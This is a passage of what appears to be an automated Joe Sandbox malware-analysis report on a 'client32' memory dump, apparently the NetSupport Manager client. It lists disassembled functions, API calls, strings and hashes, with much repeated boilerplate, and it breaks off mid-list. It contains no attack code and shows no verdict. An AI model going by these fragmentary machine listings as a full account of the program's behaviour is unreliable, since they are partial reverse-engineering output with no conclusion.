<tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td , xrefs: 110094F1
https://, xrefs: 110094AF
IsA(), xrefs: 11009525, 1100954D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp$FileWrite
String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td $IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://$https://$r>b/
API String ID: 1635020204-227897935
Opcode ID: b11a3e4c238259d2fbc588d12090e526e1a57e1cc9220299ac93f4f0d3e75ca9
Instruction ID: f49766fd7765917b195ffb41f19f8f79b4adc18e23b7e5197df46bfb74996d4c
Opcode Fuzzy Hash: b11a3e4c238259d2fbc588d12090e526e1a57e1cc9220299ac93f4f0d3e75ca9
Instruction Fuzzy Hash: 8B318B7AE0061AABDB11DF85CC44FDEF7B8FF49654F008158F815A7280EB34AA04CBA1

Function 11135710 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76librarytimeloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A78400), ref: 11134490
Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF

LoadLibraryA.KERNEL32(secur32.dll,2F623E72,?,?,?), ref: 11135751
GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 11135769
timeGetTime.WINMM(?,?), ref: 1113577C
timeGetTime.WINMM(?,?), ref: 11135793
GetLastError.KERNEL32(?,?), ref: 11135799
FreeLibrary.KERNEL32(00000000,?,?), ref: 111357BB

Strings

secur32.dll, xrefs: 1113574C
GetUserNameEx ret %d, %s, time=%d ms, e=%d, xrefs: 111357A6
GetUserNameExA, xrefs: 1113575C

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryTimetime$AddressCloseErrorFreeLastLoadOpenProcVersion_memset_strncpy
String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
API String ID: 780815626-3523682560
Opcode ID: 811087eced48bf1352f6921602963d150d6912d54705ec714e7290c854b1a43f
Instruction ID: bfca20c34ba55109964591b9ec2aab8120f7022172a2dbe8792ba9d2971a07f3
Opcode Fuzzy Hash: 811087eced48bf1352f6921602963d150d6912d54705ec714e7290c854b1a43f
Instruction Fuzzy Hash: CC21A176D00665ABDB119FA8DD88BAFFFB8EB45B25F144125ED15E3244E7309900CBE0

Function 11045030 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 327windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 110450E1
_malloc.LIBCMT ref: 1104517D
_memmove.LIBCMT ref: 110451E2
SendMessageTimeoutA.USER32(?,0000004A,00010486,00000005,00000002,00002710,?), ref: 11045242
_free.LIBCMT ref: 11045249

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Part of subcall function 11041AF0: _free.LIBCMT ref: 11041B77
Part of subcall function 11041AF0: _free.LIBCMT ref: 11041B97
Part of subcall function 11041AF0: _strncpy.LIBCMT ref: 11041BC5
Part of subcall function 11041AF0: _strncpy.LIBCMT ref: 11041C02
Part of subcall function 11041AF0: _malloc.LIBCMT ref: 11041C3C

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h, xrefs: 11045167, 1104519E, 110451CA, 11045208
r>b/, xrefs: 11045077, 1104507F, 11045089
IsA(), xrefs: 1104516C, 110451A3, 110451CF, 1104520D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
String ID: IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h$r>b/
API String ID: 3960737985-3747308489
Opcode ID: eefcbeac992f8a4b96fd6a11993a51ffb348e885ca27b5cf02128d9ce2300ed7
Instruction ID: 815efef73f6f8acdca62cf46f73826a5586355b94afe20fa4b17fb913d10d18d
Opcode Fuzzy Hash: eefcbeac992f8a4b96fd6a11993a51ffb348e885ca27b5cf02128d9ce2300ed7
Instruction Fuzzy Hash: C9C18374E006069FDB04DFA4C8D0EDEF7F5BF89308F208169E51AAB695DB71A905CB90

Function 110536E0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

GetTickCount.KERNEL32 ref: 11053756

Part of subcall function 11149650: LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11053767), ref: 1114969B
Part of subcall function 11149650: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 111496B4
Part of subcall function 11149650: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 111496C4
Part of subcall function 11149650: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 111496D4
Part of subcall function 11149650: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111496E4
Part of subcall function 11149650: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111496F4

GetTickCount.KERNEL32 ref: 110538B3

Strings

gfff, xrefs: 11053732
Client, xrefs: 1105371A
e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h, xrefs: 110538F6, 11053922
DisableWirelessInfo, xrefs: 11053715
Info. NC_WIRELESS took %d ms, xrefs: 110538C2
IsA(), xrefs: 110538FB, 11053927

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$LibraryLoad__wcstoi64
String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h$gfff
API String ID: 1442689885-1949447006
Opcode ID: b837cf7c05538536436f92a0ef7b010139c94455bec120160b0aa3c720a3186b
Instruction ID: 7827e2edb24fac33c59c52358bb09f7cba71aff0da70996b01fde8729e0bebca
Opcode Fuzzy Hash: b837cf7c05538536436f92a0ef7b010139c94455bec120160b0aa3c720a3186b
Instruction Fuzzy Hash: 64915E75E0425E9FCB45CF94C894AEEF7B6BF59318F144158D809AB381EB30AE05CB91

Function 1113D910 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1113D930

Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E

_memmove.LIBCMT ref: 1113D9B7
_memmove.LIBCMT ref: 1113D9DB
_memmove.LIBCMT ref: 1113DA15
_memmove.LIBCMT ref: 1113DA31
std::exception::exception.LIBCMT ref: 1113DA7B
__CxxThrowException@8.LIBCMT ref: 1113DA90

Strings

deque<T> too long, xrefs: 1113D92B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: c1969f914094e2e961e60f7e3b0c626231fd5e55af7b1e2491d55dcc13b08851
Instruction ID: 8e9a17c8dc419c098ee782313f80260c1a6fb39a36ef7bee055fccaa34dead5b
Opcode Fuzzy Hash: c1969f914094e2e961e60f7e3b0c626231fd5e55af7b1e2491d55dcc13b08851
Instruction Fuzzy Hash: 6051C976E001059BDF44CE68CD8169EFBFAAFC4225F99C569DC09D7308FA74EA418790

Function 110CD5C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110CD5E0

Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E

_memmove.LIBCMT ref: 110CD667
_memmove.LIBCMT ref: 110CD68B
_memmove.LIBCMT ref: 110CD6C5
_memmove.LIBCMT ref: 110CD6E1
std::exception::exception.LIBCMT ref: 110CD72B
__CxxThrowException@8.LIBCMT ref: 110CD740

Strings

deque<T> too long, xrefs: 110CD5DB

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 53509356ea8bdf0e54952da7c3cb1b9069d41bb1bf0bff1c0fd6a3581a53c676
Instruction ID: 6781a1fe05296667d86fcfe15e514985d94196c5d48f867e94dc86382c5f7813
Opcode Fuzzy Hash: 53509356ea8bdf0e54952da7c3cb1b9069d41bb1bf0bff1c0fd6a3581a53c676
Instruction Fuzzy Hash: 0D51B676E001059BDB44CFA8CC81AAEFBE5AF94614F19C6A9D819D7344EA74FA01CBD0

Function 110179C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110179E0

Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E

_memmove.LIBCMT ref: 11017A67
_memmove.LIBCMT ref: 11017A8B
_memmove.LIBCMT ref: 11017AC5
_memmove.LIBCMT ref: 11017AE1
std::exception::exception.LIBCMT ref: 11017B2B
__CxxThrowException@8.LIBCMT ref: 11017B40

Strings

deque<T> too long, xrefs: 110179DB

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 72d25ebb37bd16b6717d5aebc7a5343b47a032e2f53e6a6956a0ca2853486222
Instruction ID: 6ba0c83cb7afd475c13e8a280e40270ec3a07a2df130db0dc0b15521e11f2654
Opcode Fuzzy Hash: 72d25ebb37bd16b6717d5aebc7a5343b47a032e2f53e6a6956a0ca2853486222
Instruction Fuzzy Hash: 84417976E005159BDB44CEA8CC81AAEBBF5EFC4214F59C569DC05DB308EA78FE418790

Function 110096C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110AE410: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110AE436
Part of subcall function 110AE410: GetProcAddress.KERNEL32(00000000), ref: 110AE43D
Part of subcall function 110AE410: GetCurrentProcessId.KERNEL32(00000000), ref: 110AE453

wsprintfA.USER32 ref: 110096FF
wsprintfA.USER32 ref: 11009719
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009803

Strings

Store\, xrefs: 110097A0
%s%s.htm, xrefs: 11009713
.%u, xrefs: 110096F9
ApprovedWebList, xrefs: 11009708

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
String ID: %s%s.htm$.%u$ApprovedWebList$Store\
API String ID: 559337438-1872371932
Opcode ID: dd55644000ba58bb12fc3f0f839d27638bffb303855b1f33c25c880309bf497c
Instruction ID: 2558403496efdeb09c4574a7f809f51af83126a82b387c187fd826af7bc4a94b
Opcode Fuzzy Hash: dd55644000ba58bb12fc3f0f839d27638bffb303855b1f33c25c880309bf497c
Instruction Fuzzy Hash: 57513831D0425A9FDB02CF68DC90BDABBF4AF0A304F1481E4D98DDB241FA309A44CB91

Function 110C3200 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000,?), ref: 110C325D
BeginDeferWindowPos.USER32(?), ref: 110C327F
GetWindowRect.USER32(?,?), ref: 110C32A9
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110C32D6
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000017), ref: 110C3365

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

EndDeferWindowPos.USER32(00000000), ref: 110C3381

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110C3243
m_hWnd, xrefs: 110C3248

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Defer$Rect$BeginErrorExitLastMessagePointsProcesswsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 553022447-1557312927
Opcode ID: c001c96da27efb8ecc90982f93b48cea9dc7f9539eb4b79afcd969ba7f90e69b
Instruction ID: 7f695be0691b523cdd1d5d21dea229869abac41504e52d19061d8b85fb76dc47
Opcode Fuzzy Hash: c001c96da27efb8ecc90982f93b48cea9dc7f9539eb4b79afcd969ba7f90e69b
Instruction Fuzzy Hash: 0051D0B6E00609AFCB10CFA9C984A9EFBF5BF88314F148259E855A7744C730B941CFA0

Function 1110B0D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

Part of subcall function 111057A0: GetClientRect.USER32(?,?), ref: 111057CA

GetWindowRect.USER32(?,?), ref: 1110B100
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1110B112
GetClientRect.USER32(?,?), ref: 1110B120
GetScrollRange.USER32(?,00000000,?,?), ref: 1110B161
GetSystemMetrics.USER32(00000003), ref: 1110B171
GetScrollRange.USER32(?,00000001,?,00000000), ref: 1110B184
GetSystemMetrics.USER32(00000002), ref: 1110B18E

Strings

GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 1110B1D4

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
API String ID: 4172599486-2052393828
Opcode ID: 64ddedc56d88887bb4451be383381c356aadea2b9397b7b8a9063e4f72324cbb
Instruction ID: 963abaf8dc2dfbd8bd83222bbfeff6eec01238f1e7f741d42411ca3803a77853
Opcode Fuzzy Hash: 64ddedc56d88887bb4451be383381c356aadea2b9397b7b8a9063e4f72324cbb
Instruction Fuzzy Hash: BA51B0B5E00609AFDB04CFA8D985AEEFBF9FF88314F108529E519A3240D770A941CF64

Function 11123160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

GetTickCount.KERNEL32 ref: 111231A0
Beep.KERNEL32(00000000,00000000), ref: 11123295

Strings

BeepWhileViewed, xrefs: 1112317F
Client, xrefs: 11123184, 111231DE
*SoundWhileViewed, xrefs: 111231D9

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
